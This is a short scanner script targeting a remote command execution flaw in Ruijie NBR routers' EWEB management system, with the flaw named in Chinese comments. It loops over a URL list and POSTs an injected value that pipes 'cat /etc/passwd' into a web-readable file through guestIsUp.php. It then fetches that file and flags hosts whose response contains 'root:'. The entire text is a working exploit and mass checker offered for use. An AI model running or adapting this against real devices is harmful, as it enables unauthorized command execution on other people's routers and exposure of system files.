#request urls = array
#define payload = /guest_auth/Wker.txt
#define bug = root:
#define info = 锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞
#define post = mac=1&ip=127.0.0.1|cat %2Fetc%2Fpasswd %3E Wker.txt

function main(args){
	printclolor("当前正在检测:".info,1);
	i = 0;
	num = GetArrayNum(urls);
	while(i<num){
		url = urls[i];
		try{
			HttpPost(url."/guest_auth/guestIsUp.php",post,"Content-Type: application/x-www-form-urlencoded".StrRN()."User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
			res = HttpGet(url.payload,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
			if(StrFindStr(res[0],bug,0)!= "-1")
			{
				printclolor("[+]".urls[i].info,3);
			}
		}catch{
		}
		i = ToInt(i+1);
	}
	
}
